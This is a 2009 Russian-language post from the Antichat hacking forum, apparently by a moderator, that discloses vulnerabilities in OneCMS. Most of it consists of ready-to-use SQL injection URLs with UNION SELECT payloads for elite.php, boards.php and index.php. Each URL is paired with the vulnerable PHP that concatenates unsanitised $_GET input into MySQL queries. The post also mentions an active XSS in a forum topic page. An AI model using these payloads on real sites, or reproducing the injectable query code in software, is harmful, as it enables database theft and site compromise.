Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
08.11.2009, 07:31
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
OneCMS
OneCMS
SQL Иньекция.
/elite.php?user=-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+
Уязвимый код:
PHP код:
$row = mysql_fetch_row(mysql_query("SELECT aim,msn,website,nickname,location,username,yahoo,icq,gtalk,birthday FROM onecms_profile WHERE id = '".$_GET['user']."'"));
$aim = stripslashes($row[0]);
$msn = stripslashes($row[1]);
$website = stripslashes($row[2]);
$nickname = stripslashes($row[3]);
$location = stripslashes($row[4]);
$yahoo = stripslashes($row[6]);
$icq = stripslashes($row[7]);
$gtalk = stripslashes($row[8]);
$bday = explode("|", $row[9]);
/boards.php?t=report&id=-1'+union+select+1,2,3,4,5,6+--+
Уязвимый код:
PHP код:
if (($_GET['t'] == "report") && ($_GET['id'])) {
$id = $_GET['id'];
$info = mysql_fetch_row(mysql_query("SELECT subject,type,tid,uid,ip,fid FROM onecms_posts WHERE id = '".$id."'"));
(Выводимое поле 1)
/index.php?list=1'+union+select+1,2,3,4,5,6,7,8,9,1 0,11+--+
Уязвимый код:
PHP код:
$sql = mysql_query("SELECT * FROM onecms_content WHERE cat = '".$_GET['list']."' AND systems = '".$_GET['s']."' AND games = '".$_GET['g']."' AND name LIKE '".$_GET['abc']."%' AND ver = '0' ORDER BY `".$by."` ".$type." LIMIT ".$limit);
(Выводимое поле 2)
Активная XSS:
/topic1.html
Отвечаем:
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид